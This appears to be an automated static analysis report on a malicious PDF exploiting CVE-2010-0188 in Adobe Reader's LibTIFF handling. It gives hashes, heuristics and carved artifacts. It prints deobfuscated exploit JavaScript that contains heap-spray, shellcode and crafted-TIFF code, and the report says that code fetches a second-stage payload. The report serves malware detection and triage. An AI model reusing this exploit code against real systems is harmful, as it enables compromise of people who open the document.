Malicious PDF — malware analysis report

Static analysis result for SHA-256 0f30ad13099a2e81…

MALICIOUS

PDF

9.6 KB
MD5: d4764784c391cd14a013929b290bcb71 SHA-1: 0771be46f33e83bbb9bd7febbf00387322b09c67 SHA-256: 0f30ad13099a2e8120e78528fe99b097caee061445967c9d8452e6b58fbf353e
118 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1059.007 Command and Scripting Interpreter: JavaScript

The PDF file contains XFA form elements and triggers a critical vulnerability (CVE-2010-0188) in Adobe Reader's LibTIFF image handling. The vulnerability is exploited by embedded JavaScript, which is designed to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness, and the recovered (base-26 decoded) XFA JavaScript matches the CVE-2010-0188 exploit template, confirming the exploitation attempt.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) through which each URL was reached.
    • http://www.xfa.org/schema/xfa-locale-set/2.1/ — In PDF document text
    • http://ns.adobe.com/xdp/ — In PDF document text
    • http://www.xfa.org/schema/xci/1.0/ — In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.2/ — In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/ — In PDF document text

Extracted artifacts 7

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
embedded_file_obj0041.bin
c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb
pdf-embedded-file PDF EmbeddedFile object 41 at offset 0x109C 85 bytes
embedded_file_obj0042.bin
dda0835df994b8be920f715db36452f6cee7bb42bbc9c897f878a7b298ba8e91
pdf-embedded-file PDF EmbeddedFile object 42 at offset 0x114E 1029 bytes
embedded_file_obj0063.bin
015ca25eba00104ec31e8bf7f47275a3732f548fa758cdc05df7b67cbf6f51b9
pdf-embedded-file PDF EmbeddedFile object 63 at offset 0x1367 8672 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
embedded_file_obj0044.bin
3dd68f00f4fcb366a2a3a17c65cb2626eeddf5ea5713302d374310561d810169
pdf-embedded-file PDF EmbeddedFile object 44 at offset 0x2390 144 bytes
embedded_file_obj0045.bin
10c03f88a5f0a0833dc5b2c8ac295b3a3c6f65e23889eb8cc1dc6fe29bf7f275
pdf-embedded-file PDF EmbeddedFile object 45 at offset 0x243D 77 bytes
xfa_base26_stage_000.js
d8d3ec5f47d325a68c42d6909eb045895d79b4aacc4c4f8180318a569d1f0119
deobfuscated-js XFA base-26 decoded JavaScript (decompressed) at offset 0x17B6 2146 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+rawd2.split('').reverse().join('').replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+rawd2.split('').reverse().join('').replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function 
_j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
deobfuscated.js
65040decb88b2dea1b439f0f66dabb9d2f592ed7305d418ab12d7e49fb035034
deobfuscated-js PDF JavaScript deobfuscation pass 21085 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script. Note: the preview below appears to be a PDF CMap (Adobe-Identity-UCS) and page content stream rather than JavaScript, so the "obfuscation or payload: likely" flag on this artifact should be confirmed against the full 21085-byte file before being relied on.
2                                   �   �     � � ��   ;    � 
1.000 1.000 1.000 rg 0 0 m 9 0 l 9 9 l 0 9 l h f 0.000 0.000 0.000 RG 0 w 0 0 m 9 9 l S 9 0 m 0 9 l S 
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS) /Supplement 0 >> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
100 beginbfchar
<00> <FFFD>
<01> <FFFD>
<02> <FFFD>
<03> <FFFD>
<04> <FFFD>
<05> <FFFD>
<06> <FFFD>
<07> <FFFD>
<08> <FFFD>
<09> <FFFD>
<0A> <FFFD>
<0B> <FFFD>
<0C> <FFFD>
<0D> <FFFD>
<0E> <FFFD>
<0F> <FFFD>
<10> <FFFD>
<11> <FFFD>
<12> <FFFD>
<13> <FFFD>
<14> <FFFD>
<15> <FFFD>
<16> <FFFD>
<17> <FFFD>
<18> <FFFD>
<19> <FFFD>
<1A> <FFFD>
<1B> <FFFD>
<1C> <FFFD>
<1D> <FFFD>
<1E> <FFFD>
<1F> <FFFD>
<20> <0020>
<21> <0021>
<22> <0022>
<23> <0023>
<24> <0024>
<25> <0025>
<26> <0026>
<27> <0027>
<28> <0028>
<29> <0029>
<2A> <002A>
<2B> <002B>
<2C> <002C>
<2D> <002D>
<2E> <002E>
<2F> <002F>
<30> <0030>
<31> <0031>
<32> <0032>
<33> <0033>
<34> <0034>
<35> <0035>
<36> <0036>
<37> <0037>
<38> <0038>
<39> <0039>
<3A> <003A>
<3B> <003B>
<3C> <003C>
<3D> <003D>
<3E> <003E>
<3F> <003F>
<40> <0040>
<41> <0041>
<42> <0042>
<43> <0043>
<44> <0044>
<45> <0045>
<46> <0046>
<47> <0047>
<48> <0048>
<49> <0049>
<4A> <004A>
<4B> <004B>
<4C> <004C>
<4D> <004D>
<4E> <004E>
<4F> <004F>
<50> <0050>
<51> <0051>
<52> <0052>
<53> <0053>
<54> <0054>
<55> <0055>
<56> <0056>
<57> <0057>
<58> <0058>
<59> <0059>
<5A> <005A>
<5B> <005B>
<5C> <005C>
<5D> <005D>
<5E> <005E>
<5F> <005F>
<60> <0060>
<61> <0061>
<62> <0062>
<63> <0063>
endbfchar
100 beginbfchar
<64> <0064>
<65> <0065>
<66> <0066>
<67> <0067>
<68> <0068>
<69> <0069>
<6A> <006A>
<6B> <006B>
<6C> <006C>
<6D> <006D>
<6E> <006E>
<6F> <006F>
<70> <0070>
<71> <0071>
<72> <0072>
<73> <0073>
<74> <0074>
<75> <0075>
<76> <0076>
<77> <0077>
<78> <0078>
<79> <0079>
<7A> <007A>
<7B> <007B>
<7C> <007C>
<7D> <007D>
<7E> <007E>
<7F> <2022>
<80> <20AC>
<81> <2022>
<82> <201A>
<83> <0192>
<84> <201E>
<85> <2026>
<86> <2020>
<87> <2021>
<88> <02C6>
<89> <2030>
<8A> <0160>
<8B> <2039>
<8C> <0152>
<8D> <2022>
<8E> <017D>
<8F> <2022>
<90> <2022>
<91> <2018>
<92> <2019>
<93> <201C>
<94> <201D>
<95> <2022>
<96> <2013>
<97> <2014>
<98> <02DC>
<99> <2122>
<9A> <0161>
<9B> <203A>
<9C> <0153>
<9D> <2022>
<9E> <017E>
<9F> <0178>
<A0> <0020>
<A1> <00A1>
<A2> <00A2>
<A3> <00A3>
<A4> <00A4>
<A5> <00A5>
<A6> <00A6>
<A7> <00A7>
<A8> <00A8>
<A9> <00A9>
<AA> <00AA>
<AB> <00AB>
<AC> <00AC>
<AD> <002D>
<AE> <00AE>
<AF> <00AF>
<B0> <00B0>
<B1> <00B1>
<B2> <00B2>
<B3> <00B3>
<B4> <00B4>
<B5> <00B5>
<B6> <00B6>
<B7> <00B7>
<B8> <00B8>
<B9> <00B9>
<BA> <00BA>
<BB> <00BB>
<BC> <00BC>
<BD> <00BD>
<BE> <00BE>
<BF> <00BF>
<C0> <00C0>
<C1> <00C1>
<C2> <00C2>
<C3> <00C3>
<C4> <00C4>
<C5> <00C5>
<C6> <00C6>
<C7> <00C7>
endbfchar
56 beginbfchar
<C8> <00C8>
<C9> <00C9>
<CA> <00CA>
<CB> <00CB>
<CC> <00CC>
<CD> <00CD>
<CE> <00CE>
<CF> <00CF>
<D0> <00D0>
<D1> <00D1>
<D2> <00D2>
<D3> <00D3>
<D4> <00D4>
<D5> <00D5>
<D6> <00D6>
<D7> <00D7>
<D8> <00D8>
<D9> <00D9>
<DA> <00DA>
<DB> <00DB>
<DC> <00DC>
<DD> <00DD>
<DE> <00DE>
<DF> <00DF>
<E0> <00E0>
<E1> <00E1>
<E2> <00E2>
<E3> <00E3>
<E4> <00E4>
<E5> <00E5>
<E6> <00E6>
<E7> <00E7>
<E8> <00E8>
<E9> <00E9>
<EA> <00EA>
<EB> <00EB>
<EC> <00EC>
<ED> <00ED>
<EE> <00EE>
<EF> <00EF>
<F0> <00F0>
<F1> <00F1>
<F2> <00F2>
<F3> <00F3>
<F4> <00F4>
<F5> <00F5>
<F6> <00F6>
<F7> <00F7>
<F8> <00F8>
<F9> <00F9>
<FA> <00FA>
<FB> <00FB>
<FC> <00FC>
<FD> <00FD>
<FE> <00FE>
<FF> <00FF>
endbfchar
endcmap CMapName currentdict /CMap defineresource pop end end


/CS0 cs /P0 scn
1 i 
288 720 m
288 441 l
369 441 l
369 720 l
288 720 l
h
f
0 0 0 RG
0 i 0.5 w 10 M 0 j 0 J [0.5 1]0 d 
287.75 441 m
369.25 441 l
S
369 720.25 m
369 440.75 l
S
[2 1]0 d 
288 720.25 m
288 440.75 l
S
/Caption <</MCID 0 >>BDC 
0 0 0 rg
1 i 
BT
/C0_0 1 Tf
0 Tc 0 Tw 0  Ts 100  Tz 0 Tr 10 0 0 10 288 446.587 Tm
<002A>Tj
<004E>Tj
<0042>Tj
<0048>Tj
<0046>Tj
<0001>Tj
<0027>Tj
<004A>Tj
<0046>Tj
<004D>Tj
<0045>Tj
ET
EMC 

<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xml
... (truncated)